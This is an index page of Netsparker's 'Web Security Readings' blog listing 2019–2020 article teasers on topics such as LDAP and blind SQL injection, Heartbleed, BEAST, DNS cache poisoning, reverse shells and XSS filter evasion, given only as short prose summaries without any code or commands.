Web Application Security Zone by Netsparker

What is LDAP Injection and How to Prevent It

Category: Web Security Readings - Last Updated: Fri, 13 Mar 2020 - by Zbigniew Banach
What is LDAP Injection and How to Prevent It

LDAP injection attacks exploit input validation vulnerabilities to inject and execute queries to Lightweight Directory Access Protocol servers. LDAP services are crucial for the daily operation of many organizations, and a successful LDAP injection attack can provide valuable information for further attacks on databases and internal applications. This article looks at how LDAP injection works and shows how it can be prevented to improve web application security. Read More

How to Define Cybersecurity Metrics for Web Applications

Category: Web Security Readings - Last Updated: Fri, 06 Mar 2020 - by Zbigniew Banach
How to Define Cybersecurity Metrics for Web Applications

Everyone is concerned about information security, data breaches, malware, and cyberattacks, but how do you actually measure an organization’s cybersecurity? How can you quantify the current state of cybersecurity and track improvements? Every cybersecurity program needs carefully defined cybersecurity metrics – performance indicators that provide meaningful and comparable values. This article shows how to define useful cybersecurity metrics, examines the benefits they can bring, and suggests a starter set of metrics for web application security. Read More

Can Vulnerability Scanning Replace Penetration Testing?

Category: Web Security Readings - Last Updated: Fri, 28 Feb 2020 - by Zbigniew Banach
Can Vulnerability Scanning Replace Penetration Testing?

At first glance, penetration testing and vulnerability scanning appear to be two different names for the same basic task: finding vulnerabilities. Under pressure to reduce costs, businesses may be tempted to replace penetration testers with ever-improving vulnerability scanning solutions. In reality, vulnerability scanning and penetration testing are two very different processes, and each is vital to ensure accurate vulnerability assessments and maintain a solid security posture. Let’s have a closer look at both approaches and see how they can be combined to maximize web application security. Read More

How Blind SQL Injection Works

Category: Web Security Readings - Last Updated: Fri, 21 Feb 2020 - by Zbigniew Banach
How Blind SQL Injection Works

Blind SQL injection is a type of SQL injection attack where the attacker indirectly discovers information by analyzing server reactions to injected SQL queries, even though injection results are not visible. Blind SQL injection attacks are used against web applications that are vulnerable to SQL injection but don’t directly reveal information. While more time-consuming than regular SQL injection, blind SQL injection attacks can be automated to map out the database structure and extract sensitive information from the database server. Read More

The Challenges of Ensuring IoT Security

Category: Web Security Readings - Last Updated: Fri, 14 Feb 2020 - by Zbigniew Banach
The Challenges of Ensuring IoT Security

It’s no secret that cybersecurity and the Internet of Things don’t go well together. Thousands of IoT devices are finding their ways into homes, businesses, and many other areas of our lives, but security is rarely high on device manufacturers’ list of priorities. With no industry standards for architecture or security, devices often use custom-built operating systems and proprietary communication protocols. Internet of Things security remains a veritable minefield, and problems with IoT cyberattacks and malware can only continue to grow along with the number of devices. So why is it so hard to secure IoT devices, and what can we do about it? Read More

The Heartbleed Bug: How a Forgotten Bounds Check Broke the Internet

Category: Web Security Readings - Last Updated: Fri, 07 Feb 2020 - by Zbigniew Banach
The Heartbleed Bug: How a Forgotten Bounds Check Broke the Internet

The Heartbleed bug is a critical buffer over-read flaw in several versions of the OpenSSL library that can reveal unencrypted information from the system memory of a server or client running a vulnerable version of OpenSSL. Attacks can reveal highly sensitive data, such as login credentials, TLS private keys, and personal information. Let's take a closer look at one of the most serious and widespread security vulnerabilities in web history and see how just one buggy line of code could wreak havoc across the world. Read More

Using a Cybersecurity Framework for Web Application Security

Category: Web Security Readings - Last Updated: Fri, 31 Jan 2020 - by Zbigniew Banach
Using a Cybersecurity Framework for Web Application Security

A cybersecurity framework is a comprehensive set of guidelines that help organizations define cybersecurity policies to assess their security posture and increase resilience in the face of cyberattacks. Cybersecurity frameworks formally define security controls, risk assessment methods, and appropriate safeguards to protect information systems and data from cyberthreats. This article looks at the reasons for using a cybersecurity framework and shows how you can find best-practice cybersecurity processes and actions to apply to web application security. Read More

Announcing the Netsparker Whitepaper: False Positives in Web Application Security – Facing the Challenge

Category: Web Security Readings - Last Updated: Thu, 23 Jan 2020 - by Netsparker Team
Announcing the Netsparker Whitepaper: False Positives in Web Application Security – Facing the Challenge

The fast pace of modern web application development requires automated tools for vulnerability scanning and management, and false positives in vulnerability scan results can have a serious impact on the performance of security teams. This whitepaper discusses the many problems that false positives can bring all across the organization and shows how Netsparker’s Proof-Based Scanning™ technology can help to restore confidence in automated vulnerability scanning, improve workflow automation and web application security, and achieve real business benefits. Read More

How the BEAST Attack Works

Category: Web Security Readings - Last Updated: Fri, 17 Jan 2020 - by Zbigniew Banach
How the BEAST Attack Works

BEAST, or Browser Exploit Against SSL/TLS, was an attack that allowed a man-in-the-middle attacker to uncover information from an encrypted SSL/TLS 1.0 session by exploiting a known theoretical vulnerability. The threat prompted browser vendors and web server administrators to move to TLS v1.1 or higher and implement additional safeguards. Although no modern web browser remains vulnerable, the BEAST attack shows how a minor theoretical vulnerability can be combined with other weaknesses to craft a practical attack. This article looks at how the BEAST attack worked, why it was possible, and how it was eventually mitigated. Read More

System Hardening for Your Web Applications

Category: Web Security Readings - Last Updated: Tue, 14 Jan 2020 - by Zbigniew Banach
System Hardening for Your Web Applications

System hardening is the practice of securing a computer system by reducing its attack surface. This includes removing unnecessary services and unused software, closing open network ports, changing default settings, and so on. For web applications, the attack surface is also affected by the configuration of all underlying operating systems, databases, network devices, application servers, and web servers. This article examines approaches to system hardening and shows what security measures you can apply to keep your web applications safe. Read More

CWE/SANS Top 25 Software Errors for 2019

Category: Web Security Readings - Last Updated: Fri, 03 Jan 2020 - by Zbigniew Banach
CWE/SANS Top 25 Software Errors for 2019

In September 2019, a new CWE/SANS Top 25 Most Dangerous Software Errors list was published for the first time since 2011. Unlike previous lists, it was calculated by analyzing reported vulnerabilities to determine underlying weaknesses, so it is especially valuable for developers and software security professionals. This article looks at the top-rated software weaknesses and shows how they apply in practice to web application security. Read More

Season's Greetings

Category: Web Security Readings - Last Updated: Tue, 24 Dec 2019 - by Netsparker Team
Season's Greetings

The entire Netsparker team would like to wish you all the best in the upcoming holiday season. Whether you are celebrating Christmas, Hanukkah, Kwanzaa, Yule, Las Posadas, or simply taking the time off to rest, may you spend it with those who are closest to you. Read More

How DNS Cache Poisoning Attacks Work

Category: Web Security Readings - Last Updated: Fri, 13 Dec 2019 - by Zbigniew Banach
How DNS Cache Poisoning Attacks Work

DNS cache poisoning attacks try to fool applications into connecting to a malicious IP address by flooding a DNS resolver cache with fake addresses corresponding to requested domain names. If the attacker succeeds in filling the DNS cache with false data, the resolver might return a spoofed address instead of querying for the real one. As a result, the user might connect to a malicious site at the address returned from the cache. Let’s see why DNS spoofing is possible and how you can mitigate the threat. Read More

Ferruh Mavituna Talks About Building a Realistic Web Security Program on Enterprise Security Weekly #164

Category: Web Security Readings - Last Updated: Tue, 10 Dec 2019 - by Allen Baird
Ferruh Mavituna Talks About Building a Realistic Web Security Program on Enterprise Security Weekly #164

Netsparker CEO Ferruh Mavituna is interviewed on Enterprise Security Weekly about how to start building a realistic web security program in enterprises. He discusses the shift-left approach by which security is built into the application at an earlier stage, and how to reach this stage in a safe, prioritized and persuasive way. Read More

Understanding Reverse Shells

Category: Web Security Readings - Last Updated: Tue, 03 Dec 2019 - by Zbigniew Banach
Understanding Reverse Shells

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the attacker’s host. Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack. Reverse shells can also work across a NAT or firewall. This article explains how reverse shells work in practice and what you can do to prevent them. Read More

Top 10 Cybersecurity Trends to Look Out For in 2020

Category: Web Security Readings - Last Updated: Tue, 19 Nov 2019 - by Zbigniew Banach
Top 10 Cybersecurity Trends to Look Out For in 2020

2019 has seen cybersecurity issues firmly take their place in the news, both for the technology industry and the general public. While organizations are increasingly aware of the importance of cybersecurity, most are struggling to define and implement the required security measures. In this article, we take a look at 10 cybersecurity trends that are likely to shape the cybersecurity landscape in 2020, from data breaches and IT security staff shortages to security automation and integration. Read More

Red Team Vs Blue Team Testing for Cybersecurity

Category: Web Security Readings - Last Updated: Thu, 14 Nov 2019 - by Zbigniew Banach
Red Team Vs Blue Team Testing for Cybersecurity

Red team versus blue team exercises simulate real-life cyberattacks against organizations to locate weaknesses and improve information security. In this wargaming approach, the red team are the attackers and they attempt to infiltrate an organization’s digital and physical defenses using any attack techniques available to real attackers. The blue team’s job is to detect penetration attempts and prevent exploitation. Red team vs blue team exercises can last several weeks and provide a realistic assessment of an organization’s security posture. Read More

Why Static Code Analysis Is Not Enough to Secure Your Web Applications

Category: Web Security Readings - Last Updated: Thu, 07 Nov 2019 - by Zbigniew Banach
Why Static Code Analysis Is Not Enough to Secure Your Web Applications

Static code analysis tools are used to automatically check source code for errors and security vulnerabilities, as well as ensure compliance with coding standards. While effective for some classes of vulnerabilities, they have a number of disadvantages and limitations, especially for web applications. Dynamic analysis solutions address many of these problems and can complement or replace static tools. This article looks at some of the shortcomings of static analysis and shows how deploying dynamic analysis tools can help you improve web application security. Read More

XSS Filter Evasion

Category: Web Security Readings - Last Updated: Thu, 24 Oct 2019 - by Zbigniew Banach
XSS Filter Evasion

XSS filter evasion refers to a variety of methods used by attackers to bypass Cross-Site Scripting filters. Attackers attempting to inject malicious JavaScript into web page code must not only exploit an application vulnerability, but also evade input validation and fool complex browser filters. This article looks at some common approaches to XSS filter evasion and shows what you can do to improve application security. Read More